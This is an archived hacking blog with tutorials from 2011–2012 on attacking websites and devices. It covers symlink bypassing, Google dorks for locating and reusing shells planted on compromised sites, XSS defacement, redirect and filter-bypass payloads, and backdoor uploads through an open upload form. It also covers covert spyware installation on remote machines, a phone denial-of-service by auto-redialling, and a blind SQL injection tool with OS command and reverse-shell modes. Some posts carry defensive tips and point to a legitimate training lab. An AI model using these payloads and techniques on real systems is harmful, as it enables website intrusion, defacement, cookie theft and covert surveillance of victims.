Moreover, it is not a new thing; it has been used for centuries by different people, including historical figures from your own nation.

Think about it: might you have been social engineered by someone, somewhere?

That's all for this first introductory tutorial.
If you have any questions, want to give feedback, or want something explained in this tutorial series, please post in the comments.


Article author: Ashish Mistry
Article license: Social Engineering tutorials series by Ashish Mistry is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

Sunday, February 19, 2012

How to hack websites using Symlink Bypassing?



Symlink Bypassing:
A symlink (symbolic link) is a file on Linux that points to another file or directory. Symlink bypassing is a hacking technique used to gain unauthorized access to directories on a server: on shared web hosting, an attacker who can create files in their own account (for example through an uploaded shell) creates symlinks pointing at files outside it, such as another customer's configuration file, and reads them through the web server if it follows symlinks and does not isolate accounts from each other. Using this technique, hackers are able to hack multiple sites on a shared web hosting service.

Here is a video tutorial that explains how to hack a website using symlink bypassing. The video demo was created by SilentHacker.



Download the symlink files from here:
http://www.2shared.com/file/Xkcfffjr/Symlink_files_by_silent_hacker.html

Soon I will explain more about symlink bypassing and post a text tutorial with screenshots!

Sunday, February 12, 2012

Google dork "Index of /sh3llZ" lets you find shells uploaded by hackers



Usually hackers upload a shell to a victim's site using a vulnerability in that website. The shell lets them control or deface the website. Sometimes hackers leave the shell behind on the vulnerable site. Here is a simple Google search that lets you find shells uploaded by hackers.

Use one of the following Google dorks to find the shell:
  • intitle:index of/sh3llZ
  • "Index of /sh3llZ"
  • "/sh3llZ/uploadshell/uploadshell.php"
This will show a list of sites that have a sh3llZ folder. Probably there will be a link to a c99 shell. If you click the link, it lands you on a shell page. Using that shell, you can upload your own shells or deface the sites. Keep in mind that any site listed here is already compromised, and using a shell you did not install is still unauthorized access; the useful thing to do with such a finding is to notify the site owner.

Credits:
DevilsCafe

Saturday, December 31, 2011

How to deface a website with Cross Site Scripting? : Complete XSS Tutorial



This is my third article about Cross Site Scripting. Last time I explained how to test for XSS vulnerabilities and some filter-bypassing techniques. Now let us see how a hacker defaces a website using an XSS vulnerability.

Never use this technique on a site you do not own. I am explaining it for educational purposes only.

Defacing is one of the most common things a hacker does after finding a vulnerability in a website. Defacing means replacing the site's content with the hacker's own. Often it is done to inform the admin about the vulnerability, but that is a bad idea!

Script for changing the background colour of a website:
<script>document.body.bgColor="red";</script>


Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement page with Pastehtml:
First upload a defacement page (HTML) to pastehtml.com and get the link.

When you find an XSS-vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script redirects the page to your pastehtml defacement page.

Note: Only a persistent (stored) XSS gives a lasting defacement. With reflected XSS the script runs only for whoever opens the crafted link, so the site itself looks unchanged to other visitors.

Sunday, December 25, 2011

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing



copyrights reserved © BreakTheSecurity
Hi friends, last time I explained what XSS is and how an attacker can inject a malicious script into your site. As promised, here is the advanced XSS tutorial (more articles will follow).

Sometimes website owners use XSS filters (a WAF) to protect against XSS.
For example, if you submit <script>alert("hi")</script> and the filter escapes or replaces the " (quote) character, the script may become
<script>alert(>xss detected<)</script>
and no longer works. Filters use different filtering methods to protect against XSS. In such cases we can use some tricks to bypass the filter, and that is what this article covers.

1. Bypassing magic_quotes_gpc

magic_quotes_gpc=On is a PHP setting (configured in php.ini) that automatically escapes every ' (single quote), " (double quote), \ (backslash) and NUL byte in request data with a backslash.
For example:
<script>alert("hi");</script> arrives as <script>alert(\"hi\");</script>, which is a JavaScript syntax error, so the script no longer works.

This is a well-known filtering method, but it is easy to bypass by supplying the string as character codes instead.
For example, alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
String.fromCharCode() only builds the string; it must still be executed, so the script becomes <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59))</script>. This contains no " (double quote), ' (single quote) or \ (backslash), so magic_quotes has nothing to escape, and the script runs.
String.fromCharCode() is a JavaScript function that converts a list of character codes into a string.

How to convert to character codes?

Some online sites do the conversion, but I suggest the Hackbar Firefox add-on.

After installing Hackbar, press F9. A small box opens above the URL bar. Click XSS -> String.fromCharCode().

A small window pops up. Enter the code, for instance alert("Hi"), and click OK. Now we have the output.

Wrap the output in eval() inside <script></script> and insert it into the vulnerable site.

For example:
hxxp://vulnerable-site/search?q=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59))</script>

2. Hex encoding

We can URL-encode (percent-encode) the whole script as hex so that a filter matching the literal text does not see it.
For example, <script>alert("Hi");</script> encodes to:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Put the encoded script in the request to the vulnerable site.
For example:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Note that the web server decodes the %xx sequences before the application sees the parameter, so this only defeats filters that inspect the raw, undecoded request; a filter that runs on the decoded value sees the plain script again.
Converting to hex:
This site converts text to hex: http://centricle.com/tools/ascii-hex/
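Here is an added example (written for this edit, not code from the original post or from Hackbar) that produces both encodings from sections 1 and 2 in code, and shows why the hex form survives only a raw-request filter. The payload string and the example URL are constructed for the demonstration.

```javascript
// Added example (not from the original post): builds the two encoded forms of
// the payload discussed in sections 1 and 2. The payload is constructed here.
const PAYLOAD = 'alert("hi");';

// Section 1: express a string as a String.fromCharCode(...) call so that the
// submitted text contains no quote or backslash for magic_quotes_gpc (or a
// quote-stripping filter) to mangle. String.fromCharCode only *builds* the
// string, so the call is wrapped in eval() to actually execute it.
function toCharCodeCall(s) {
  const codes = Array.from(s, (ch) => ch.charCodeAt(0));
  return 'eval(String.fromCharCode(' + codes.join(', ') + '))';
}

// True if the text still contains a character that magic_quotes would escape.
function hasQuoteOrBackslash(s) {
  return /["'\\]/.test(s);
}

// Section 2: percent-encode every byte of the script, so the request line
// carries only %xx sequences (lower-case hex, as in the post).
function hexEncode(s) {
  return Array.from(Buffer.from(s, 'utf8'),
    (b) => '%' + b.toString(16).padStart(2, '0')).join('');
}

// What the application sees after the web server URL-decodes the parameter:
// the original text again. Hex encoding therefore only defeats filters that
// inspect the raw, undecoded request, not ones that run on the decoded value.
function asSeenByApplication(encoded) {
  return decodeURIComponent(encoded);
}

// Assemble the request URL of section 2 (base URL and parameter are assumed).
function buildInjectedUrl(base, param, script) {
  return base + '?' + param + '=' + hexEncode(script);
}
```

toCharCodeCall(PAYLOAD) gives exactly the eval(String.fromCharCode(...)) form shown above; asSeenByApplication(hexEncode(x)) returns x unchanged, which is the caveat in code.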

3. Bypassing using obfuscation

Some site admins put the words script and alert on a blocked-word list, so whenever you enter these keywords the filter removes them or returns an error such as "you are not allowed to search this". A case-sensitive filter can be bypassed by changing the case of the keywords. Note that only the HTML tag name is case-insensitive; JavaScript identifiers are case-sensitive, so alert itself must stay lower-case or the browser throws a ReferenceError.
For example:
<ScRipT>alert("hi");</sCrIpT>

This bypass technique rarely works, but it is worth a try.

4. Closing tag

When the input lands inside an HTML attribute value (for example <input value="...">), putting "> at the beginning of the payload closes the attribute and the tag, so our script tag is parsed as markup:

"><script>alert("Hi");</script>

This ends the previously opened tag and opens our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

Conclusion:
From the above it is clear that XSS filters alone are not going to protect a site from XSS attacks. If you really want to make your site more secure, have pen testers test your application or test it yourself, and encode output correctly at the point where user input is placed into the page.

There are many other filter-bypassing techniques; I have only covered some useful ones here.



Sunday, December 4, 2011

"Simple Upload 53" vulnerability allows hackers to upload a shell


A web application vulnerability in the "Simple Upload 53" PHP file allows an attacker to upload a backdoor shell to your website.

"inurl:simple-upload-53.php"
Using this Google search you can find vulnerable sites.

If you want to check whether your own web application is affected, use this Google dork:
"inurl:simple-upload-53.php site:Your-Site.com"

If the search returns any page ending with "simple-upload-53.php", follow the link.

Example:
hxxp://www.target_site.com/simple-upload-53.php

Now you can see the upload form on the site. Here is the biggest problem: it allows anyone to upload files.

An attacker can upload a backdoor shell named ".php.jpg", ".php.gif" etc. The extra extension gets past a check that looks only at the last extension, and on Apache servers where a handler is bound to ".php" with AddHandler, mod_mime still executes a file named shell.php.jpg as PHP.

The uploaded shell will be at this location:
 hxxp://www.target_site.com/files/Your_file_With_Extension

After uploading the shell, an attacker can deface your site. So check whether your site has this vulnerability too.

"Prevention is better than Cure".

Wednesday, November 16, 2011

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention


Last time I explained the clickjacking attack and its prevention. Today I am going to explain the Self-XSS (Cross Site Scripting) attack.

What is Self-XSS?
Self-XSS is a popular social-engineering attack in which attackers trick users into pasting malicious code into their own browser. The result is that the attacker's script runs in the user's session on whatever site is open. Scammers usually use it to trick users into buying products or to make money through online surveys.

Recently, hackers flooded Facebook with explicit hardcore porn images. Facebook said it might have been a self-XSS attack.

JavaScript can be executed from the browser URL bar.
For example, enter the following in your browser:
javascript:alert('BreakTheSecurity');
This shows a pop-up box with "BreakTheSecurity". An attacker can use the same mechanism for malicious purposes: stealing confidential data or cookies, redirecting to malware sites and more.
For example:
Entering the following code displays the current site's cookies in your browser:
javascript:alert("Cookies: " + document.cookie + "\n By \n BreakTheSecurity");

The above code does nothing malicious other than displaying the cookies (only those not marked HttpOnly, which script cannot read). But an attacker can extend the script so that it takes advantage of your data. Current browsers strip the "javascript:" prefix when such a URL is pasted into the address bar, precisely to blunt this attack, which is why scammers now ask victims to paste the code into the developer console instead.

Security tips from BreakTheSecurity:
  • Use the NoScript add-on, which prevents JavaScript from running in your browser unless you allow it.
  • Don't click shortened URLs, for example bit.ly/55ewEb?22. They may redirect to infected sites.
Be aware of social engineering:
  • If anyone asks you (even a friend) to paste scripts into the browser bar or console, never do it.
  • If anyone says "iPhone for only $10", don't be eager to click it.
  • If anyone says "1000 shares will cure a baby", don't share it. Facebook shares never raise money or cure a baby.
  • Read our EHN spam report to keep up to date with the latest Facebook scams.
God gave us a sixth sense; use it, and think before you click any link or follow someone's instructions.

Thursday, November 10, 2011

Remotely spy on any computer using Win-Spy


Let's say you would like to find out what your child is doing on their computer. How do you do it? Buy a spy camera and place it in the room? No, you can just get software that records a log of their activity.

There is a program called "Win-Spy" that takes care of this and helps you find out what your child is doing on their system.

The software can be installed on the local system or on a remote system and lets you monitor that system.

It is capable of capturing whatever the target user sees or types on the keyboard.

You can get it from here:
http://www.win-spy.com/Download%20WS.html

Tuesday, November 8, 2011

DoS (denial of service) attack on Mobile phones


As security professionals in a world shaped by information security, we have seen many kinds of DoS and DDoS attacks around the world. But what if someone DoSes your daily communication companion, your mobile phone, and you are unable to call or operate the phone properly, not even to listen to music or watch videos?

Some years back, around 2003, a DoS was possible on a Nokia phone. Now there is a new way (at least I think so) to perform a DoS attack on a Samsung mobile phone, because of the auto call reject functionality of Samsung phones.

Auto call reject: this function of Samsung phones is used to block a number from calling you. When a person adds a number such as xxxxxxxxxx to the reject list and xxxxxxxxxx calls that person, the call is automatically disconnected, so that number cannot connect a call to you.

Example: Bob has a Samsung mobile phone and adds Mak's number to his auto reject list. When Mak calls Bob, the call is disconnected at the first ring and Bob only gets a missed call alert for Mak's call.

It is a nice function for blocking unwanted callers, but as the example shows, the reject function rejects the call yet still shows a missed call alert for the blocked number. This is the main flaw (bug) that allows the DoS on Samsung mobile phones.

Take the above example again: Mak's number is in the reject list of Bob's Samsung phone, so when Mak calls Bob his call ends immediately with a missed call alert on Bob's phone. But what if Mak calls Bob again every few seconds? Then it becomes a DoS on Bob's phone: if Mak calls Bob again and again using his phone's auto-redial function, Bob is unable to receive anyone else's calls, because the phone reports busy to other callers. Bob cannot even make calls, listen to music or videos, or take photos, because the phone continuously shows missed call alerts for Mak's calls.

It happens because the missed call alert takes a long time to disappear from the phone's screen. Samsung could add a function like some Chinese phones have: they show no alert on the screen and just keep entries of blocked calls.

Anyone can give missed calls to a number for a while; once the user of that Samsung phone adds the number to the auto reject list, you can register on mobivox or a similar service and write an AutoIt3 script or similar to keep giving missed calls to the person, which is a DoS on their Samsung mobile.

Author: Ashish Mistry, Founder of Hcon
Information Security Researcher, Penetration Tester, Malware Researcher, Trainer


Thursday, November 3, 2011

What is Clickjacking Attack? How to Prevent? | UI Redressing


Will answering a simple maths quiz delete your social network account? If your answer is "No", then check this news about the LinkedIn clickjacking vulnerability and come back. Will visiting a website turn on your webcam? The answer is "Yes": check the Flash Player clickjacking vulnerability.

If you have read the above news, it will be easy to understand what clickjacking is. OK, let's continue with the article.
Clickjacking, also known as UI redressing, is a malicious technique that tricks users into clicking a button or image that performs a hidden action on another site.
An attacker uses multiple transparent or opaque layers to trick a user into clicking a button or link on another page when they intended to click on the innocuous page. Thus the attacker hijacks the click and sends it to another website, which is why it is called clickjacking (click + hijacking). The term was coined by Jeremiah Grossman and Robert Hansen in 2008.

Example:
Let us take the real-world example of the LinkedIn clickjacking vulnerability.
The image above looks like a simple maths problem. Once you click the submit button, it deletes your LinkedIn account (if you are logged in) without asking any questions.

Clickjacking can be used for:
  • tricking users into turning on their webcam and microphone using the Adobe Flash vulnerability (since fixed by Adobe)
  • getting more Twitter followers
  • posting on your Facebook wall
  • deleting your profile

Prevention techniques:

Client side (security tips for users):
Flash Player:
Update your Flash Player (old versions are vulnerable to clickjacking).

Browser security add-ons:
NoScript:
NoScript is a Firefox add-on that provides protection against clickjacking, XSS and other malicious scripts. NoScript is available for mobile Firefox too.

Comitari Web Protection Suite: Comitari provides client-side protection against clickjacking (aka UI redressing) attacks. It is installed as a browser add-on.

GuardedID: a commercial product that provides client-side clickjacking protection for users of IE or Firefox without interfering with legitimate iframes.

Server side (for developers)
Frame killer:
A framekiller is a JavaScript snippet placed in a web page to stop the page being displayed inside a frame on another site, which defends against frame-based clickjacking. Framekillers can be defeated (for example when the framing page uses the HTML5 sandbox attribute, or blocks the navigation the script attempts), so the reliable fix is the X-Frame-Options response header (DENY or SAMEORIGIN) or the Content-Security-Policy frame-ancestors directive, with the script only as a fallback.
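Here is an added example (written for this edit, not from the original post) of the framekiller logic and its server-side counterpart. The functions take the window object as a parameter so the check can be exercised outside a browser; the URLs in the usage are assumptions.

```javascript
// Added example (not from the original post): the classic framekiller written
// as testable functions, plus the response headers that should be set instead.
// Real deployments rely on X-Frame-Options (DENY or SAMEORIGIN) or CSP
// frame-ancestors; the script is only a fallback for old browsers.

// True when the page is loaded inside a frame, i.e. its window is not the top one.
function isFramed(win) {
  return win.top !== win.self;
}

// Framekiller: if framed, navigate the outer (attacking) window to this page,
// replacing the attacker's overlay. Returns the URL navigated to, or null.
function breakOutOfFrame(win) {
  if (!isFramed(win)) return null;
  win.top.location = win.self.location.href;
  return win.self.location.href;
}

// Server-side counterpart (e.g. set on every response from a Node.js handler):
// the header-based defence that works even when the script is neutralised.
function frameProtectionHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// In a browser this runs on page load; in Node.js there is no window object.
if (typeof window !== 'undefined') breakOutOfFrame(window);
```

Use SAMEORIGIN (or frame-ancestors 'self') instead of DENY when your own site legitimately frames the page.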

Friday, October 21, 2011

How to unlock a passcode-protected iPad 2 running iOS 5 with a Smart Cover


Video Demo:


A temporary fix follows:
You can work around this bug by disabling Smart Cover unlocking in the iPad 2 Settings under the General tab.


Disclaimer:
This video was not created by us. We are sharing it to make the vulnerability known.

Friday, October 14, 2011

Cross Site Scripting (XSS) Complete Tutorial for Beginners ~ Web Application Vulnerability



What is XSS?
Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

In a typical XSS attack, a hacker injects malicious JavaScript into a legitimate website. When a user visits the specially crafted link, the malicious JavaScript executes in the user's browser. A successfully exploited XSS vulnerability lets attackers run phishing attacks, steal accounts and even spread worms.
Example: imagine a hacker discovers an XSS vulnerability in Gmail and injects a malicious script. When a user visits the site, the script executes. The code could redirect users to a fake Gmail page or capture cookies. Using the stolen cookies, the attacker can log in to your account and change the password.
XSS will be easy to understand if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of the HTTP client-server architecture (Reference)
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

XSS Attack:
Step 1: Finding a vulnerable website
Hackers use Google dorks such as "?search=" or ".php?q=" to find candidate sites. Skilled (1337) attackers target specific sites instead of using Google. If you are going to test your own site, you have to check every page that reflects input for the vulnerability.

Step 2: Testing for the vulnerability
First of all, we have to find an input field through which we can inject our own script, for example a search box, a username or password field, or any other input.


Test 1:
Once we have found the input field, let us put some string into it, for instance "BTS". The page displays the result.

Now right-click the page and select View Source. Search for the string "BTS" we entered in the input field and note where in the HTML it is placed.

Test 2:
Now we check whether the server sanitizes our input. To do this, enter the <script> tag in the input field.
View the source of the page and find the location where the input was displayed in the previous test.

If our code is not sanitized by the server, it appears exactly as we entered it in the field. If the server had sanitized the input, it would look like &lt;script&gt;. Unsanitized reflection indicates that the website is vulnerable to XSS and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is probably vulnerable to XSS. To make sure, inject a complete piece of JavaScript, for instance <script>alert('BTS')</script>.

If a pop-up box with the string 'BTS' appears, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.
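Here is an added example (written for this edit, not code from the original tutorial) that shows the search page from Test 2 rendered the vulnerable way and the fixed way, and turns the "view source" check into a function. The template and the probe string are constructed for the demonstration.

```javascript
// Added example (not from the original tutorial): the search page rendered the
// vulnerable way and the fixed way, plus the "view source" check from Test 2
// done in code. The template and the probe string are constructed here.

// Vulnerable rendering: the search term is concatenated straight into the HTML.
function renderSearchVulnerable(q) {
  return '<h2>Search results for ' + q + '</h2>';
}

// Fixed rendering: HTML-encode the characters that have meaning in markup
// before placing user input into the text of the page.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSearchSafe(q) {
  return '<h2>Search results for ' + escapeHtml(q) + '</h2>';
}

// Test 2 in code: the input is reflected unsanitized if the probe appears in
// the response exactly as it was sent; a sanitized page carries &lt;script&gt;.
function reflectsUnsanitized(responseHtml, probe) {
  return responseHtml.includes(probe);
}

const PROBE = "<script>alert('BTS')</script>";   // constructed test input
```

escapeHtml is the right encoder only for input placed between tags; input that lands inside an attribute value, a script block or a URL needs the encoding appropriate to that context, which is why a single global filter keeps failing.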

Types of XSS based on persistence:
Based on persistence, XSS attacks can be categorized into two types, persistent and non-persistent.

Persistent XSS:

A persistent or stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database and then served to everyone who views the affected page.

For example:
Many websites host a support forum where registered users can ask questions by posting messages, which are stored in the database. Imagine an attacker posts a message containing malicious JavaScript instead. If the server fails to sanitize the input, the injected script executes whenever a user reads the post. If the injected code steals cookies, it steals the cookies of every user who reads the post, and with those the attacker can take over their accounts.


Non-persistent XSS:

Non-persistent XSS, also called reflected XSS, is the most common type of XSS today. In this type of attack, the injected code is sent to the server in an HTTP request. The server embeds the input in the HTML and returns it to the browser in the HTTP response. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Consider a project hosting website. To find our favourite project, we type a related word into the search box. When the search finishes, it displays a message like "search results for yourword". If the server fails to sanitize the input properly, a script injected in the search term executes.

In a reflected XSS attack, the attacker sends the specially crafted link to victims and tricks them into clicking it. When the user clicks the link, the browser sends the injected code to the server, the server reflects it back in the response, and the browser executes it.

In addition to these types, there is a third type called DOM-based XSS, which I will explain in a later post.

What can an attacker do with this vulnerability?
  • Steal identities and confidential data (credit card details).
  • Bypass restrictions on websites.
  • Hijack sessions (steal session cookies).
  • Deliver malware.
  • Deface the website.
  • Denial of service (DoS) attacks.

Disclaimer:
This article is intended for educational purpose only.

Tuesday, October 11, 2011

Automated Blind SQL Injection Attack Tools ~ bsqlbf Brute Forcer


What is Blind SQL Injection?
Some websites are vulnerable to SQL injection, but the results of the injection are not visible to the attacker. In that situation blind SQL injection is used. The vulnerable page may not display data, but it renders differently depending on the truth of a logical statement injected into the legitimate SQL statement for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit (or character) recovered.
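Here is an added example (written for this edit, not part of bsqlbf) of the extraction loop behind a boolean-based blind injection, run against a simulated true/false page so it works offline. The secret value, the table and column names in the SQL fragment, and the 7-bit ASCII range are assumptions for the demonstration.

```javascript
// Added example (not part of bsqlbf): boolean-based blind extraction against a
// simulated page. The "database" value is constructed here; only the oracle
// (does the page render its "true" variant?) would talk to a real target.

const SECRET = 'admin:s3cr3t';   // constructed sample value being extracted

// Simulates the back end: answers one injected comparison of the form
// ASCII(SUBSTRING(secret,pos,1)) > n with a true/false page (Type 0 style).
// Positions past the end of the string behave as character code 0.
function oracle(pos, n) {
  const code = pos <= SECRET.length ? SECRET.charCodeAt(pos - 1) : 0;
  return code > n;
}

// The SQL fragment a real attacker would append for the same question
// (MySQL syntax, table and column names assumed); shown for reference only.
function condition(pos, n) {
  return ' AND ASCII(SUBSTRING((SELECT secret FROM t LIMIT 1),' + pos + ',1))>' + n;
}

// Binary search one character over the 7-bit range: always 7 requests,
// instead of up to 127 linear guesses.
function extractChar(ask, pos) {
  let lo = 0, hi = 127, requests = 0;
  while (lo < hi) {
    const mid = (lo + hi) >> 1;
    requests++;
    if (ask(pos, mid)) lo = mid + 1; else hi = mid;
  }
  return { code: lo, requests };
}

// Walk the positions until the character code comes back 0 (end of string)
// or maxLen is reached; report the total number of requests needed.
function extractString(ask, maxLen) {
  let out = '', total = 0;
  for (let pos = 1; pos <= maxLen; pos++) {
    const { code, requests } = extractChar(ask, pos);
    total += requests;
    if (code === 0) break;
    out += String.fromCharCode(code);
  }
  return { value: out, requests: total };
}
```

extractString(oracle, 32) recovers the 12-character secret in 91 requests (13 positions including the terminator, 7 each), which is where the "time-intensive" remark above comes from: every request is one HTTP round trip, and a time-based blind injection multiplies each by the sleep delay.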

There are plenty of automated blind SQL injection tools available. Here I introduce one of them, bsqlbf (Blind SQL Injection Brute Forcer).

The tool is written in Perl and extracts data through blind SQL injection. It accepts custom SQL queries as a command-line parameter and works for both integer-based and string-based injections.
Supported Database:
  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle

The tool supports the following attack modes (-type switch):
Type 0: blind SQL injection based on true and false conditions returned by the back-end server

Type 1: blind SQL injection based on true and error (e.g. syntax error) returned by the back-end server

Type 2: blind SQL injection in "order by" and "group by"

Type 3: extracting data with SYS privileges (Oracle dbms_export_extension exploit)

Type 4: OS code execution (Oracle dbms_export_extension exploit)

Type 5: reading files (Oracle dbms_export_extension exploit, based on Java)

Type 6: OS code execution via the DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: OS code execution via SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), requires DBA privileges

-cmd=revshell: Type 7 supports meterpreter payload execution; run generator.exe first

Type 8: OS code execution via DBMS_JAVA_TEST.FUNCALL, requires Java IO permissions

-cmd=revshell: Type 8 supports meterpreter payload execution; run generator.exe first

For Type 4 (OS code execution) the following methods are supported:

-stype: how you want to execute the command:

SType 0 (default) is based on Java; it will NOT work against Oracle XE.

SType 1 is against Oracle 9 with plsql_native_make_utility.

SType 2 is against Oracle 10 with dbms_scheduler.


Disclaimer:
This article is for educational purposes only. The above software was developed for penetration testers to test their own web applications for vulnerabilities.

Sunday, October 9, 2011

Learn Web Application Exploits and Defenses for free~Penetration Testing


Are you willing to learn web application exploitation and how to defend against it? Here is your chance. Google provides a code lab for learning web application security, free of cost.


Penetration Testing :
  • Learn how hackers find security vulnerabilities!
  • Learn how hackers exploit web applications!
  • Learn how to stop them! 
This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:
  • How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
  • How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.
To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

Gruyere 
This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking.

In black-box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view HTTP headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests.

In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code.

You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

Each challenge is tagged to indicate which techniques are required to solve it:

Challenges that can be solved just by using black box techniques.

Challenges that require that you look at the Gruyere source code.

Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

WARNING: 
Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 

 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com